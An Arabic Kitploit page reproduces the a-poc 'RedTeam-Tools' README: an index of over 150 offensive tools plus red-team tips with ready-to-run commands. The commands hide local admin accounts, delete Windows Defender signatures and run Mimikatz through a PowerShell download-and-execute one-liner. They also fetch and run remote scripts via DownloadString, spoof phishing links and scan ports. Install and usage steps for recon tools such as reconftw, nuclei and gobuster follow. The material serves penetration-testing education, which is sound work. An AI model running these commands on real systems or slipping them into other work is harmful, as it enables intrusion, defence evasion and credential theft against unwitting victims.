Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/a-poc/redteam-tools
الاستخبارات مفتوحة المصدر (OSINT)تصعيد الامتيازاتالاستطلاعالاستغلالالحركة الجانبيةما بعد الاستغلالالتصيد الاحتيالياختبار الاختراقالفريق الأحمرتطوير الحمولات
GitHuba-poc/redteam-tools

RedTeam-Tools

9.6k1.3kمنذ 4 أشهرتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

أدوات وتقنيات للفريق الأحمر / اختبار الاختراق

عرض المستودع

أدوات الفريق الأحمر

يحتوي هذا المستودع على مجموعة من أكثر من 150 أداة ومورد يمكن أن تكون مفيدة لأنشطة الفريق الأحمر.

قد تكون بعض الأدوات مصممة خصيصًا للفريق الأحمر، بينما البعض الآخر عام ويمكن تكييفه لاستخدامه في سياق الفريق الأحمر.

🔗 إذا كنت من فريق الدفاع (Blue Teamer)، فاطلع على BlueTeam-Tools

تحذير

المواد الموجودة في هذا المستودع مخصصة للأغراض المعلوماتية والتعليمية فقط. وليست مخصصة للاستخدام في أي أنشطة غير قانونية.

ملاحظة

إخفاء عناوين قوائم الأدوات باستخدام السهم.

انقر على 🔙 للعودة إلى القائمة.

قائمة الأدوات

نصائح الفريق الأحمر 19 نصيحة
    • تحسين تهريب HTML باستخدام مستمع حركة الماوس @pr0xylife
    • ترجمة جوجل للتصيد @malmoeb
    • إخفاء حساب المسؤول المحلي @Alh4zr3d
    • تعطيل Windows Defender بحذف التوقيعات @Alh4zr3d
    • تمكين جلسات RDP متعددة لكل مستخدم @Alh4zr3d
    • بديل محلي لـ Sysinternals PsExec.exe @GuhnooPlusLinux
    • ماسح المنافذ باستخدام الأدوات المدمجة @Alh4zr3d
    • PowerShell DownloadString مدرك للوكيل @Alh4zr3d
    • البحث عن نقاط النهاية الداخلية في إشارات المتصفح @Alh4zr3d
    • استعلام سجلات DNS للتعداد @Alh4zr3d
    • مسارات الخدمات غير المقتبسة بدون PowerUp @Alh4zr3d
    • تجاوز موجه الأوامر المعطل باستخدام /k Martin Sohn Christensen
    • منع Windows Defender من حذف mimikatz.exe @GuhnooPlusLinux
    • التحقق مما إذا كنت في جهاز افتراضي @dmcxblue
    • تعداد قواعد AppLocker @Alh4zr3d
    • اختصار CMD بـ 6 بكسل عبر mspaint PenTestPartners
    • انتحال الروابط باستخدام طريقة PreventDefault في JavaScript
    • التحقق من قواعد جدار الحماية SMB باستخدام Responder @malmoeb
    • تعطيل مكافحة الفيروسات باستخدام SysInternals PsSuspend @0gtweet
الاستطلاع 24 أداة
    • spiderfoot OSINT آلي ورسم خرائط سطح الهجوم
    • reconftw أداة استطلاع تلقائي للنطاقات الفرعية والثغرات
    • subzy فاحص استيلاء النطاقات الفرعية
    • smtp-user-enum تعداد مستخدمي SMTP
    • crt.sh -> httprobe -> EyeWitness التقاط شاشات تلقائي للنطاقات
    • jsendpoints استخراج روابط DOM للصفحة
    • nuclei ماسح الثغرات
    • certSniff متشمم كلمات مفتاحية لسجلات شهادات SSL
    • gobuster القوة العمياء لمسارات المواقع
    • feroxbuster أداة اكتشاف محتوى سريعة مكتوبة بلغة Rust
    • CloudBrute القوة العمياء للبنية التحتية السحابية
    • dnsrecon تعداد سجلات DNS
    • Shodan.io قاعدة معرفة للأنظمة العامة
    • AORT (أداة استطلاع شاملة) تعداد النطاقات الفرعية
    • spoofcheck فاحص سجلات SPF/DMARC
    • AWSBucketDump تعداد دلاء S3
    • GitHarvester باحث بيانات الاعتماد على GitHub
    • truffleHog ماسح بيانات الاعتماد على GitHub
    • Dismap اكتشاف/تحديد الأصول
    • enum4linux تعداد Windows/samba
    • skanuvaty ماسح DNS/شبكة/منافذ سريع بشكل خطير
    • Metabigor أداة OSINT بدون API
تطوير الموارد 12 أداة
    • remoteinjector حقن رابط قالب عن بعد في مستند Word
    • Chimera تشويش PowerShell
    • msfvenom إنشاء الحمولة
    • Shellter أداة حقن الشفرة الضارة الديناميكية
    • Freeze إنشاء الحمولة (لتجاوز EDR)
    • WordSteal سرقة تجزئات NTML باستخدام Microsoft Word
    • وظائف NTAPI غير الموثقة نواة Windows NT وواجهة Native API وبرامج التشغيل
    • وظائف استدعاء النواة واجهات برمجة تطبيقات Windows غير الموثقة
    • OffensiveVBA تقنيات تنفيذ كود ماكرو Office والتهرب
    • WSH حمولة Wsh
    • HTA حمولة Hta
    • VBA حمولة Vba
الوصول الأولي 10 أدوات
    • CredMaster أداة رش كلمات المرور CredKing
    • TREVORspray راش كلمات المرور مع تعدد المسارات
    • evilqr إثبات مفهوم لاختراق QRLJacking
    • CUPP ملف تعريف كلمات مرور المستخدمين الشائعة (CUPP)
    • Bash Bunny أداة هجوم USB
    • EvilGoPhish إطار حملات التصيد
    • مجموعة أدوات الهندسة الاجتماعية إطار حملات التصيد
    • Hydra أداة القوة العمياء
    • SquarePhish إطار تصيد OAuth/رمز QR
    • King Phisher إطار حملات التصيد
التنفيذ 13 أداة
    • Responder مسمم LLMNR وNBT-NS وMDNS
    • secretsdump مستخرج تجزئات عن بعد
    • evil-winrm شل WinRM
    • Donut تنفيذ .NET في الذاكرة
    • Macro_pack تشويش الماكرو
    • PowerSploit مجموعة نصوص PowerShell
    • Rubeus أداة اختراق الدليل النشط
    • SharpUp كاشف ثغرات Windows
    • SQLRecon مجموعة أدوات MS-SQL الهجومية
    • UltimateAppLockerByPassList تقنيات تجاوز AppLocker الشائعة
    • StarFighters مشغل Empire قائم على JavaScript وVBScript
    • demiguise أداة تشفير HTA
    • PowerZure إطار PowerShell لتقييم أمان Azure
الثبات 4 أدوات
    • Impacket مجموعة نصوص Python
    • Empire إطار ما بعد الاستغلال
    • SharPersist مجموعة أدوات الثبات لنظام Windows
    • ligolo-ng أداة أنفاق تستخدم واجهة TUN
تصعيد الامتيازات 11 أداة
    • Crassus أداة اكتشاف تصعيد الامتيازات في Windows
    • LinPEAS تصعيد الامتيازات في Linux
    • WinPEAS تصعيد الامتيازات في Windows
    • linux-smart-enumeration تصعيد الامتيازات في Linux
    • Certify تصعيد الامتيازات في الدليل النشط
    • Get-GPPPassword استخراج كلمات مرور Windows
    • Sherlock أداة تصعيد الامتيازات عبر PowerShell
    • Watson أداة تصعيد الامتيازات في Windows
    • ImpulsiveDLLHijack أداة اختطاف DLL
    • ADFSDump أداة تفريغ AD FS
    • BeRoot مشروع تصعيد الامتيازات عبر أنظمة تشغيل متعددة
التهرب من الدفاعات 8 أدوات
    • Invoke-Obfuscation مشوش النصوص
    • Veil مشوش حمولة Metasploit
    • SharpBlock تجاوز EDR عبر منع تنفيذ نقطة الدخول
    • Alcatraz مشوش ثنائيات x64 بواجهة رسومية
    • Mangle التلاعب بالملفات التنفيذية المجمعة
    • AMSI Fail مقاطع PowerShell تعطل أو تعطل AMSI
    • ScareCrow إطار إنشاء حمولات مصمم لتجاوز EDR
    • moonwalk أداة إزالة سجلات النظام وختم الوقت للملفات في Linux
الوصول إلى بيانات الاعتماد 11 أداة
    • Mimikatz مستخرج بيانات اعتماد Windows
    • LaZagne مستخرج كلمات مرور محلية
    • hashcat كسر تجزئات كلمات المرور
    • John the Ripper كسر تجزئات كلمات المرور
    • SCOMDecrypt أداة فك تشفير بيانات اعتماد SCOM
    • nanodump إنشاء تفريغ عملية LSASS
    • eviltree إعادة تصميم Tree لاكتشاف بيانات الاعتماد
    • SeeYouCM-Thief تحليل ملفات تكوين أنظمة هواتف Cisco
    • MailSniper باحث بريد Microsoft Exchange
    • SharpChromium مستخرج ملفات تعريف الارتباط والسجل وتسجيلات الدخول المحفوظة من Chromium
    • dploot سرقة DPAPI عن بعد باستخدام Python
الاكتشاف 6 أدوات
    • PCredz اكتشاف بيانات الاعتماد عبر PCAP/الواجهة المباشرة
    • PingCastle مقيم الدليل النشط
    • Seatbelt ماسح الثغرات المحلية
    • ADRecon استطلاع الدليل النشط
    • adidnsdump تفريغ DNS المدمج للدليل النشط
    • scavenger أداة مسح للبحث في الأنظمة
الحركة الجانبية 12 أداة
    • crackmapexec مجموعة أدوات الحركة الجانبية لنظام Windows/الدليل النشط
    • WMIOps أوامر WMI عن بعد
    • PowerLessShell PowerShell عن بعد بدون PowerShell
    • PsExec بديل خفيف لـ telnet
    • LiquidSnake حركة جانبية بدون ملفات
    • تمكين RDP أمر تمكين RDP في Windows
    • ترقية الشل إلى Meterpreter تحسين الشل العكسي
    • إعادة توجيه المنافذ أمر إعادة توجيه المنفذ المحلي
    • شل Jenkins العكسي أمر شل Jenkins
    • ADFSpoof تزوير رموز أمان AD FS
    • kerbrute أداة القوة العمياء للتحقق المسبق من Kerberos
    • Coercer إجبار خادم Windows على المصادقة
    • WMIOps أوامر WMI عن بعد
التجميع 3 أدوات
    • BloodHound تصور الدليل النشط
    • Snaffler جامع بيانات اعتماد الدليل النشط
    • linWinPwn تعداد الدليل النشط وفحص الثغرات
القيادة والتحكم 9 أدوات
    • مشروع العيش على المواقع الموثوقة استغلال النطاقات الشرعية لـ C2
    • Havoc إطار القيادة والتحكم
    • Covenant إطار القيادة والتحكم (.NET)
    • Merlin إطار القيادة والتحكم (Golang)
    • إطار Metasploit إطار القيادة والتحكم (Ruby)
    • Pupy إطار القيادة والتحكم (Python)
    • Brute Ratel إطار القيادة والتحكم ($$$)
    • NimPlant زرع C2 مكتوب بلغة Nim
    • Hoaxshell شل عكسي PowerShell
الاستخراج 6 أدوات
    • Dnscat2 C2 عبر أنفاق DNS
    • Cloakify تحويل البيانات للاستخراج
    • PyExfil إثبات مفهوم استخراج البيانات
    • Powershell RAT باب خلفي قائم على Python
    • GD-Thief استخراج Google Drive
    • goshs خادم متعدد البروتوكولات بملف واحد لنقل الملفات والاستخراج
التأثير 4 أدوات
    • تسريب دليل مختبري اختراق Conti مجموعة أدوات تابعة لعصابة Conti للفدية
    • SlowLoris رفض خدمة بسيط
    • usbkill مفتاح إيقاف مضاد للطب الشرعي
    • Keytap الحصول على مفاتيح لوحة المفاتيح المضغوطة من صوت الكتابة

نصائح الفريق الأحمر

تعلم من أعضاء الفريق الأحمر من خلال مجموعة من نصائح الفريق الأحمر. تغطي هذه النصائح مجموعة من التكتيكات والأدوات والمنهجيات لتحسين قدراتك في الفريق الأحمر.

🔙تحسين تهريب HTML باستخدام مستمع حركة الماوس

الوصف: 'أضاف Qakbot مستمع حدث لحركة الماوس إلى مرفق تهريب HTML لتجنب الاكتشاف في صندوق الحماية، ولن يتم إسقاط الملف المضغوط.'

المصدر: @pr0xylife

الرابط: تويتر

🔙ترجمة جوجل للتصيدالوصف: سرقة بيانات الاعتماد بنجاح من صفحة تصيد يتم توجيهها عبر وظيفة عرض الصفحة في ترجمة جوجل.

المصدر: @malmoeb

الرابط: تويتر

🔙إخفاء حساب المسؤول المحلي```bash

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /t REG_DWORD /v alh4zr3d /d 0 /f

root@kitploit:~
**الوصف:** *'إنشاء الحسابات محفوف بالمخاطر عند التهرب من المراقبة الزرقاء، ولكن عند إنشاء مسؤول محلي، استخدم بعض السحر اللطيف في الريجستري لإخفائه.'*

**الائتمان:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**الرابط:** [تويتر](https://twitter.com/Alh4zr3d/status/1612913838999113728)

### [🔙](#tool-list)تعطيل ويندوز ديفندر عن طريق حذف التوقيعات```bash
"%Program Files%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

الوصف: 'فوضوي بعض الشيء، ولكن إذا كان Windows Defender يسبب لك صداعًا كبيرًا، بدلاً من تعطيله (الذي ينبه المستخدم)، يجب عليك فقط تحييده عن طريق حذف جميع التوقيعات.'

المصدر: @Alh4zr3d

الرابط: تويتر

🔙تمكين جلسات RDP متعددة لكل مستخدم```bash

reg add HKLM\System\CurrentControlSet\Control\TerminalServer /v fSingleSessionPerUser /d 0 /f

root@kitploit:~
**الوصف:** *'في بعض الأحيان ترغب في تسجيل الدخول إلى مضيف عبر RDP أو ما شابه، لكن المستخدم لديه جلسة نشطة. قم بتمكين جلسات متعددة لكل مستخدم.'*

**الفضل:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**الرابط:** [Twitter](https://twitter.com/Alh4zr3d/status/1609954528425558016)

### [🔙](#tool-list)Sysinternals PsExec.exe بديل محلي```bash
wmic.exe /node:10.1.1.1 /user:username /password:pass process call create cmd.exe /c " command "

الوصف: "هل سئمت من رفع ملف Sysinternals PsExec.exe عند القيام بالحركة الجانبية؟ لدى Windows بديل أفضل مثبت مسبقًا. جرب هذا بدلاً من ذلك."

الفضل: @GuhnooPlusLinux

الرابط: تويتر

🔙ماسح المنافذ المحلي (Live off the land)```bash

0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect(<tgt_ip>,$)) "Port $ open"} 2>$null

root@kitploit:~
**الوصف:** *'استفد من الأدوات الموجودة على الجهاز قدر الإمكان بدلاً من رفع أدوات جديدة إليه (لأسباب عديدة). PowerShell/.NET يساعدان. مثال: ماسح منافذ بسيط في Powershell.'*

**الائتمان:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**الرابط:** [Twitter](https://twitter.com/Alh4zr3d/status/1605060950339588096)

### [🔙](#tool-list)Proxy aware PowerShell DownloadString```bash
$w=(New-Object Net.WebClient);$w.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $w.DownloadString("<url>")

الوصف: 'معظم المؤسسات الكبيرة تستخدم وكلاء ويب هذه الأيام. دالة تنزيل PowerShell القياسية لا تعمل مع الوكلاء. استخدم هذه.'

الائتمان: @Alh4zr3d

الرابط: تويتر

🔙البحث عن نقاط النهاية الداخلية في إشارات المتصفح```bash

type "C:\Users%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Bookmarks.bak" | findstr /c "name url" | findstr /v "type"

root@kitploit:~
**الوصف:** *'قد تتفاجأ مما يمكنك اكتشافه من إشارات المستخدم المرجعية وحدها. نقاط الوصول الداخلية التي يمكنه الوصول إليها، على سبيل المثال.'*

**الائتمان:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**الرابط:** [Twitter](https://twitter.com/Alh4zr3d/status/1595488676389171200)

### [🔙](#tool-list)استعلام سجلات DNS للتعداد```bash
Get-DnsRecord -RecordType A -ZoneName FQDN -Server <server hostname>

الوصف: 'الاستكشاف هو 95٪ من اللعبة. لكن إطلاق العديد من الفحوصات لتقييم البيئة أمر مزعج للغاية. لماذا لا نطلب ببساطة من خادم DC/DNS جميع سجلات DNS؟'

المصدر: @Alh4zr3d

الرابط: Twitter

🔙 مسارات الخدمات غير المقتبسة بدون PowerUp```bash

Get-CIMInstance -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$.StartMode -eq "Auto" -and $.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name

root@kitploit:~
**الوصف:** *'العثور على مسارات الخدمة غير المقتبسة بدون PowerUp'*

**الائتمان:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**الرابط:** [Twitter](https://twitter.com/Alh4zr3d/status/1579254955554136064)

### [🔙](#tool-list)تجاوز موجه الأوامر المعطل باستخدام /k```bash
# Win+R (To bring up Run Box)
cmd.exe /k "whoami"

الوصف: 'تم تعطيل موجه الأوامر هذا بواسطة المسؤول...' يمكن رؤيته عادةً في بيئات مثل أجهزة الكشك، الحل البديل السريع هو استخدام /k عبر مربع تشغيل Windows. سينفذ هذا الأمر ثم يعرض رسالة التقييد، مما يسمح بتنفيذ الأوامر.

المصدر: Martin Sohn Christensen

الرابط: المدونة

🔙منع Windows Defender من حذف mimikatz.exe```bash

(new-object net.webclient).downloadstring('https://raw.githubusercontent[.]com/BC-SECURITY/Empire/main/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1')|IEX;inv

root@kitploit:~
**الوصف:** *'هل سئمت من قيام Windows Defender بحذف mimikatz.exe؟ جرب هذا بدلاً من ذلك.'*

**الائتمان:** [@GuhnooPlusLinux](https://twitter.com/GuhnooPlusLinux)

**الرابط:** [تويتر](https://twitter.com/GuhnooPlusLinux/status/1605629049660809216)

### [🔙](#tool-list)تحقق مما إذا كنت في جهاز افتراضي```bash
reg query HKLM\SYSTEM /s | findstr /S "VirtualBox VBOX VMWare"

الوصف: 'تريد معرفة ما إذا كنت في جهاز افتراضي؟ استعلم عن مفاتيح التسجيل واكتشف!!! إذا ظهرت أي نتائج فأنت في جهاز افتراضي.'

الائتمان: @dmcxblue

الرابط: تويتر

🔙تعداد قواعد AppLocker```

(Get-AppLockerPolicy -Local).RuleCollections

Get-ChildItem -Path HKLM:Software\Policies\Microsoft\Windows\SrpV2 -Recurse

reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2\Exe\

root@kitploit:~
**الوصف:** *'يمكن أن يكون AppLocker مزعجًا. قم بالتعداد لترى مدى الألم.'*

**الائتمان:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**الرابط:** [Twitter](https://twitter.com/alh4zr3d/status/1614706476412698624)

### [🔙](#tool-list)اختصار CMD بـ 6 بكسلات عبر mspaint

![image](https://assets.kitploit.com/production/public/readmes/147/db03137fe19c2c20481ca53abc8beb4b7afadcf1d2add350ce26d37f75fdc41b.png)

1. افتح MSPaint.exe واضبط حجم اللوحة على: العرض=6 والارتفاع=1 بكسل
2. قم بتكبير الصورة لتسهيل المهام التالية
3. باستخدام منتقي الألوان، اضبط قيم البكسلات (من اليسار إلى اليمين):
    - الأول: R: 10, G: 0, B: 0
    - الثاني: R: 13, G: 10, B: 13
    - الثالث: R: 100, G: 109, B: 99
    - الرابع: R: 120, G: 101, B: 46
    - الخامس: R: 0, G: 0, B: 101
    - السادس: R: 0, G: 0, B: 0
4. احفظها كصورة نقطية 24 بت (*.bmp;*.dib)
5. غيّر امتدادها من bmp إلى bat وقم بتشغيلها.

**الوصف:** *'طريقة غير عادية لكنها فعالة للحصول على شيل عن طريق إنشاء اختصار لـ cmd.exe عبر رسم ألوان معينة في Microsoft Paint. بفضل خوارزمية الترميز المستخدمة في كتابة ملفات BMP، من الممكن التحكم في بيانات ASCII المكتوبة في ملف عن طريق اختيار ألوان RGB معينة بعناية.'*

**الائتمان:** [PenTestPartners](https://www.pentestpartners.com/)

**الرابط:** [المدونة](https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/#gainingacommandshell)

### [🔙](#tool-list)انتحال الرابط باستخدام طريقة PreventDefault في JavaScript

![image](https://assets.kitploit.com/production/public/readmes/147/49ceb382e5692c79df8ca9b96ed0c17520b7cf7f1091b5b6c214478270c165e8.png)```html
<!DOCTYPE html>
<html>
  <head>
    <meta charset="UTF-8">
    <title>PreventDefault Example</title>
  </head>
  <body>
    <a href="https://google.com" onclick="event.preventDefault(); window.location.href = 'https://bing.com';">Go to Google</a>
  </body>
</html>

الوصف: تمت ملاحظة مهاجمين يستخدمون هذه التقنية لخداع الضحايا للنقر على روابط تحميل برمجيات خبيثة مزيفة داخل الصفحة. باستخدام طريقة PreventDefault في جافاسكريبت، يمكنك تزوير رابط التمرير لعرض رابط شرعي google.com، ولكن بمجرد النقر، سيتم إعادة توجيه الضحية إلى رابطك الخبيث bing.com. ممتاز لجعل الضحايا يقومون بتحميل الحمولات عبر موقع مسيطر عليه.

الرابط: PreventDefault Docs

🔙فحص قواعد جدار الحماية SMB باستخدام Responder

image```powershell Copy-Item -Path "C:\tmp" -Destination "\<ip_running_responder>\c$"

root@kitploit:~
**الوصف:** *'عندما أجري تقييمًا للاختراق، غالبًا ما أطلب من العميل إذا كان بإمكاني إجراء فحص سريع أخير: `Copy-Item -Path "C:\tmp\" -Destination "\\<ip_running_responder>\c$"`. إذا تمكن Responder من التقاط الهاش، فإن الجدار الناري يسمح باتصالات SMB الصادرة'*

**المصدر:** [@malmoeb](https://twitter.com/malmoeb)

**الرابط:** [Twitter](https://twitter.com/malmoeb/status/1628272928855826433)

### [🔙](#tool-list)تعطيل مكافحة الفيروسات باستخدام SysInternals PsSuspend

![صورة](https://assets.kitploit.com/production/public/readmes/147/060631566db51351ace6c248b736fc8878e89ba9aaf8ad4aaf2e478183468b16.png)

**الوصف:** *باستخدام أداة Microsoft Sysinternals PsSuspend.exe، يمكن تعليق بعض عمليات خدمات مكافحة الفيروسات. يمكن تمرير PID أو اسم خدمة قيد التشغيل إلى الأداة الموقعة من Microsoft، حيث ستعلق العملية عبر واجهة برمجة تطبيقات NtSuspendProcess لنظام Windows.*

**منشور المدونة ذو الصلة:** [تجاوز مكافحة الفيروسات عبر تعليق العملية باستخدام PsSuspend.exe](https://medium.com/@a-poc/process-suspension-with-pssuspend-exe-0cdf5d16a3b7)

**الرابط:** [Twitter](https://twitter.com/0gtweet/status/1638069413717975046)

الاستطلاع
====================

### [🔙](#tool-list)[spiderfoot](https://github.com/smicallef/spiderfoot)

SpiderFoot هي أداة أتمتة لجمع المعلومات مفتوحة المصدر (OSINT). تتكامل مع كل مصدر بيانات تقريبًا وتستخدم مجموعة من الأساليب لتحليل البيانات، مما يجعل التنقل في تلك البيانات أمرًا سهلاً.

يمكن استخدام SpiderFoot بشكل هجومي (على سبيل المثال، في تمرين الفريق الأحمر أو اختبار الاختراق) للاستطلاع عن هدفك، أو بشكل دفاعي لجمع معلومات حول ما قد تكون أنت أو مؤسستك قد كشفت عنه عبر الإنترنت.

**التثبيت:**```bash
wget https://github.com/smicallef/spiderfoot/archive/v4.0.tar.gz
tar zxvf v4.0.tar.gz
cd spiderfoot-4.0
pip3 install -r requirements.txt

للحصول على تعليمات التثبيت الكاملة، انظر هنا.

الاستخدام:```python python3 ./sf.py -l 127.0.0.1:5001

root@kitploit:~
الكثير من فيديوهات تعليمية للاستخدام [هنا](https://asciinema.org/~spiderfoot)

![spiderfoot](https://assets.kitploit.com/production/public/readmes/147/bd95a49c8707ebb8b864103b3c024971be0bfef116fecada0a5499165378da14.png)

*الصورة مأخوذة من https://github.com/smicallef/spiderfoot*

### [🔙](#tool-list)[reconftw](https://github.com/six2dez/reconftw)

reconFTW يقوم بأتمتة عملية الاستطلاع بأكملها نيابةً عنك. يتفوق في عمل تعداد النطاقات الفرعية إلى جانب فحوصات الثغرات المختلفة والحصول على أقصى معلومات عن هدفك.

**التثبيت:**```bash
git clone https://github.com/six2dez/reconftw.git;cd reconftw/;./install.sh

للحصول على تعليمات التثبيت الكاملة، انظر هنا.

الاستخدام:```bash

Single target domain

./reconftw.sh -d target.com -r

One target with multiple domains

./reconftw.sh -m target -l domains.txt -r

Passive recon

./reconftw.sh -d target.com -p

Perform all checks and exploitations

./reconftw.sh -d target.com -a

root@kitploit:~
للحصول على تعليمات الاستخدام الكاملة انظر [هنا](https://github.com/six2dez/reconftw/wiki/2.-Usage-Guide).

![reconftw](https://assets.kitploit.com/production/public/readmes/147/319a1191b403d8b616058e77f696f9b2802b59607cc7e908a38e61a8de99a25e.png)

*الصورة مستخدمة من https://www.youtube.com/watch?v=TQmDAtkD1Wo*

### [🔙](#tool-list)[subzy](https://github.com/PentestPad/subzy)

أداة استيلاء على النطاقات الفرعية تعمل بناءً على مطابقة بصمات الاستجابة من [can-i-take-over-xyz](https://github.com/EdOverflow/can-i-take-over-xyz/blob/master/README.md).

**التثبيت:**```bash
go install -v github.com/PentestPad/subzy@latest

للاطلاع على تعليمات التثبيت الكاملة، انظر هنا.

الاستخدام:```bash

List of subdomains

./subzy run --targets list.txt

Single or multiple targets

./subzy run --target test.google.com ./subzy run --target test.google.com,https://test.yahoo.com

root@kitploit:~
![subzy](https://assets.kitploit.com/production/public/readmes/147/cb8d580bf7a8b0647632d14dda58e9f350703db0fa10ef16cfdc04464520c063.jpg)

*صورة مستخدمة من https://www.geeksforgeeks.org/subzy-subdomain-takeover-vulnerability-checker-tool/*

### [🔙](#tool-list)[smtp-user-enum](https://github.com/cytopia/smtp-user-enum)

تعداد مستخدمي SMTP عبر VRFY وEXPN وRCPT مع وظائف المهلة الزمنية الذكية وإعادة المحاولة وإعادة الاتصال.

**تثبيت:**```bash
pip install smtp-user-enum

الاستخدام:```bash smtp-user-enum [options] -u/-U host port smtp-user-enum --help smtp-user-enum --version

root@kitploit:~
![smtp-user-enum](https://assets.kitploit.com/production/public/readmes/147/d5d973253dfaa7e98d497954d59b83f166ba7b3807d24714a6ac40189fbdc15e.png)

*الصورة مستخدمة من https://www.kali.org/tools/smtp-user-enum/*

### [🔙](#tool-list)crt.sh -> httprobe -> EyeWitness

لقد قمت بتجميع أمر bash من سطر واحد يقوم بـ:
- جمع قائمة من النطاقات الفرعية بشكل سلبي من شهادات الارتباط ([crt.sh](https://crt.sh/))
- طلب كل نطاق فرعي بشكل نشط للتحقق من وجوده ([httprobe](https://github.com/tomnomnom/httprobe))
- التقاط لقطة شاشة لكل نطاق فرعي بشكل نشط للمراجعة اليدوية ([EyeWitness](https://github.com/FortyNorthSecurity/EyeWitness))

**الاستخدام:**```bash
domain=DOMAIN_COM;rand=$RANDOM;curl -fsSL "https://crt.sh/?q=${domain}" | pup 'td text{}' | grep "${domain}" | sort -n | uniq | httprobe > /tmp/enum_tmp_${rand}.txt; python3 /usr/share/eyewitness/EyeWitness.py -f /tmp/enum_tmp_${rand}.txt --web

ملاحظة: يجب أن يكون لديك httprobe وpup وEyeWitness مثبتة وتغيير 'DOMAIN_COM' إلى المجال الهدف. يمكنك تشغيل هذا السكريبت بشكل متزامن في نوافذ الطرفية إذا كان لديك عدة مجالات جذرية مستهدفة

image

image

🔙jsendpoints

إشارة مرجعية لجافا سكريبت لاستخراج جميع روابط نقاط النهاية لصفحة الويب على الصفحة.

تم إنشاؤه بواسطة @renniepak، يمكن استخدام مقتطف كود جافا سكريبت هذا لاستخراج جميع نقاط النهاية (التي تبدأ بـ /) من DOM صفحة الويب الحالية بما في ذلك جميع مصادر السكريبت الخارجية المضمنة في صفحة الويب.```javascript javascript:(function(){var scripts=document.getElementsByTagName("script"),regex=/(?<=("|'|`))/[a-zA-Z0-9_?&=/-#.]*(?=("|'|`))/g;const results=new Set;for(var i=0;i<scripts.length;i++){var t=scripts[i].src;""!=t&&fetch(t).then(function(t){return t.text()}).then(function(t){var e=t.matchAll(regex);for(let r of e)results.add(r[0])}).catch(function(t){console.log("An error occurred: ",t)})}var pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);for(const match of matches)results.add(match[0]);function writeResults(){results.forEach(function(t){document.write(t+"
")})}setTimeout(writeResults,3e3);})();

root@kitploit:~
**الاستخدام (إشارة مرجعية)** 

أنشئ إشارة مرجعية...

- `انقر بزر الماوس الأيمن على شريط الإشارات المرجعية`
- `انقر على 'إضافة صفحة'`
- `الصق JavaScript أعلاه في مربع 'url'`
- `انقر على 'حفظ'`

...ثم زر صفحة الضحية في المتصفح وانقر على الإشارة المرجعية.

![image](https://assets.kitploit.com/production/public/readmes/147/a2a9b8ff2cacdcf419b64a6d99075dffa73471eea1201fb9a0a6b2524794849f.png)

**الاستخدام (وحدة التحكم)** 

الصق JavaScript أعلاه في نافذة وحدة التحكم `F12` واضغط على Enter.

![image](https://assets.kitploit.com/production/public/readmes/147/5dd2a02f0f6874c521b8a98f35f653b1cf1a13b00a4c7e3eaf7c111700c0cc8a.png)

### [🔙](#tool-list)[nuclei](https://github.com/projectdiscovery/nuclei)

ماسح ضوئي سريع للثغرات يستخدم قوالب .yaml للبحث عن مشكلات محددة.

**التثبيت:**```bash
go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest

الاستخدام:```bash cat domains.txt | nuclei -t /PATH/nuclei-templates/

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/a747b7be6260c2a228ac90ac4c3500debb25dd3bf1f635c5ce736159cdd7bc81.png)

### [🔙](#tool-list)[certSniff](https://github.com/A-poc/certSniff)

certSniff هي أداة مراقبة للكلمات المفتاحية في سجلات شهادات SSL (Certificate Transparency logs) كتبتها بلغة Python. تستخدم مكتبة certstream لمراقبة سجلات إنشاء الشهادات التي تحتوي على كلمات مفتاحية محددة في ملف.

يمكنك تشغيلها بعدة كلمات مفتاحية تتعلق بنطاق ضحيتك، وسيتم تسجيل أي إنشاءات للشهادات، مما قد يؤدي إلى اكتشاف نطاقات لم تكن على علم بها سابقًا.

**تثبيت:**```bash
git clone https://github.com/A-poc/certSniff;cd certSniff/;pip install -r requirements.txt

الاستخدام:```python python3 certSniff.py -f example.txt

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/61dca92ec35e9bafb2004f44e045f4fa02fb05263456ac447c323e7becb3cbc3.png)

### [🔙](#tool-list)[gobuster](https://www.kali.org/tools/gobuster/)

أداة رائعة لتجريب مسارات الملفات/المجلدات على موقع ويب مستهدف.

**تثبيت:**```bash
sudo apt install gobuster

الاستخدام:```bash gobuster dir -u "https://google.com" -w /usr/share/wordlists/dirb/big.txt --wildcard -b 301,401,403,404,500 -t 20

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/49bbb3fa465f423a5b3fa1dbe2468cb9c70ad4600532825a759da5b911a2c890.png)

